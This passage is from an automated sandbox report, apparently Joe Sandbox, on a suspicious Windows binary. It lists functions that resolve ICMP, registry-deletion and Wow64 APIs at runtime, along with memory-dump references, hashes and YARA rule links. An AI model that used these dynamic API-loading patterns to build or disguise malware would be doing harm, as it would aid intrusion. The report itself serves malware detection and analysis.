                                                                                                                                                                                                                                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312DE
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,IcmpCloseHandle), ref: 004312F0
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: ICMP.DLL$IcmpCloseHandle
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2574300362-3530519716
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 21a2acdac0ba1e2d746e72dbff1012e7ad80fb0484e1fffebf05da08cb8a0c44
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: fe30dd6f995ef3e52e92cf139519288d45b371df6a06e7fbbc01cfddaae6e452
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 21a2acdac0ba1e2d746e72dbff1012e7ad80fb0484e1fffebf05da08cb8a0c44
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 89E01275500316DFDB105F66D80564B77DCDB14751F10482AFD45E2A51DBB8D48087E8
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 004312FE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 00431310
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,IcmpCreateFile), ref: 00431322
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: ICMP.DLL$IcmpCreateFile
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2574300362-275556492
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: c8e81b458e49d693ad0b98c25d1a2273645c6015ec642ff3830cff94addfde50
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 95e0d00128142f820e0a83de5ed484af687323a382b0c693d148963e73e99334
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c8e81b458e49d693ad0b98c25d1a2273645c6015ec642ff3830cff94addfde50
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E3E0C270400306EFD7107FA5D81464A77E8DB08310F104C2AFC40A2650C7B8D48087A8
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 0043129A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312AC
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,IcmpSendEcho), ref: 004312BE
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: ICMP.DLL$IcmpSendEcho
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2574300362-58917771
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 8463976e88658be12d547e53f001863c36b7eb8c5d8a0eb88088b9b0d7e59d79
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: f6e067919a3be2c94262fb81e38fb1c28335358536499f04279aa6303c0198c7
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8463976e88658be12d547e53f001863c36b7eb8c5d8a0eb88088b9b0d7e59d79
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: ADE0C2B0400706DFC7105F65D80465B77D8DB04321F10482BFD80E2610C7B8E48087A8
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 00430C7F Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00430C91
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00430CA3
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2574300362-4033151799
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: d4a2309a593705586ca0189df29ebf11fe16cb5b9b4952fb03c76dd6ffec2ddb
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: e1e112c22781e886f83f7ab60c8bc672304d94c0271b2a691c2b6ddb7eb549cd
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d4a2309a593705586ca0189df29ebf11fe16cb5b9b4952fb03c76dd6ffec2ddb
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3FE0C2B0440315AFCB106F6AD95460B7BD89B14321F10583BF980E2600C7B8E88087B8
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 00430DC1 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(kernel32.dll), ref: 00430DD3
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00430DE5
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2574300362-1816364905
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 14bf9b0efbe06d93ad9dae09c2ad7cadeb51a6503e8f45336d859f06d84a08d6
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 24515a708fc6b3a38513646dac5635f6d90a943ae1c03eade4216686bbe3791e
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 14bf9b0efbe06d93ad9dae09c2ad7cadeb51a6503e8f45336d859f06d84a08d6
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 51E0127154070A9BD7105FA5E91878A77D8DB14751F10882AFD45E2650D7B8E480C7BC
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 00430E7B Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(kernel32.dll), ref: 00430E8D
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00430E9F
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: GetModuleHandleExW$kernel32.dll
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2574300362-199464113
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 264f8e721adbed0a0a4958d5ac8267ac8e19a3b8732fd2a865be9a36fa944cb5
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 757376e69a8637ab8385673bd519a3d20b1bca35ee4978b7889da1ae4d413b5b
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 264f8e721adbed0a0a4958d5ac8267ac8e19a3b8732fd2a865be9a36fa944cb5
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4AE01271540706DFD7105F65D91964B77D8DF18762F104C2AFD85E2650D7B8E48087AC
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 0040EF60 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(kernel32.dll,0040E5C8), ref: 0040EF6B
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 0040EF7D
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: IsWow64Process$kernel32.dll
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2574300362-3024904723
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: e434190cfc746d225dda0a282e539c1801c395cd0759adf62cd2f230f9054cea
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 8a5e235981a70bd178cc672d1476e78975e513144aeeb8d5c54acf6a3c23c6fb
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e434190cfc746d225dda0a282e539c1801c395cd0759adf62cd2f230f9054cea
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DCD0C9B4A00B03EAD7301F72DA1870A76E4AB10781F204C3EBC81E5290DBBCC0808B28
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 0040EFD0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(kernel32.dll,0040E620), ref: 0040EFDB
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 0040EFED
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2574300362-192647395
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 32947d03ff8d1999084252166fef1046a2fe6e8e233e406c4d74cfb9fa3109ee
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: faea892368b665db3229cc6598da919ac71bc07d19fee151484258049274b373
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 32947d03ff8d1999084252166fef1046a2fe6e8e233e406c4d74cfb9fa3109ee
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DAD092B4900B03AAD7301F22D91860A76A4AB00781B204C2EA981E5290DEB880809B68
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 00451D2B Relevance: 6.4, APIs: 4, Instructions: 405COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 6f77df26dc74fc40ac7bf47809af4b9178697b073442c11c01de5ef3306f6c16
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: c5df29d3d24fc858ebdc5227190e2e918b6fbc7f8fe9fd347d916346834f6d96
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6f77df26dc74fc40ac7bf47809af4b9178697b073442c11c01de5ef3306f6c16
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 66E17F75600209AFCB04DF98C880EAEB7B9FF88714F10859AE909DB351D775EE45CBA0
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 00479500 Relevance: 6.2, APIs: 4, Instructions: 162memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • VariantInit.OLEAUT32(?), ref: 0047950F
                                                                                                                                                                                                                                                                                                                                                                                                                                • SysAllocString.OLEAUT32(00000000), ref: 004795D8
                                                                                                                                                                                                                                                                                                                                                                                                                                • VariantCopy.OLEAUT32(?,?), ref: 0047960F
                                                                                                                                                                                                                                                                                                                                                                                                                                • VariantClear.OLEAUT32(?), ref: 00479650
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Variant$AllocClearCopyInitString
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2808897238-0
